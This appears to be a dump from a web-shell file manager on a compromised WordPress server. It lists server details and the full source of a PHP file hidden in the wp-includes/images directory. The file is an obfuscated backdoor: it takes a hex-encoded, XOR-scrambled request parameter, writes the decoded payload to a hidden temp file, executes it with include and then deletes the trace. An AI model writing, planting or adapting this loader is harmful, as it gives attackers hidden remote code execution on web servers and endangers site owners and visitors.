HEX
Server: Apache/2.4.6 () PHP/7.4.33
System: Linux chile-dev-app-1 5.4.17-2136.315.5.el7uek.x86_64 #2 SMP Wed Dec 21 19:57:57 PST 2022 x86_64
User: apache (48)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/html/wp-includes/images/top.1775474092.php
<!--MlHPk2Ba-->
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x63o\x6D\x70on\x65\x6Et"])){
$bind = array_filter([getenv("TMP"), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/var/tmp"]);
$val = hex2bin($_REQUEST["\x63o\x6D\x70on\x65\x6Et"]);
$holder     =     ''    ;   foreach(str_split($val) as $char){$holder.=chr(ord($char)^98);}
while ($ptr = array_shift($bind)) {
            if ((bool)is_dir($ptr) && (bool)is_writable($ptr)) {
            $property_set = "$ptr/.data_chunk";
            if ($object = fopen($property_set, 'w')) {
    if (fwrite($object, $holder) !== false) {
        fclose($object);
        include $property_set;
        @unlink($property_set);
        exit;
    }
}
        }
}
}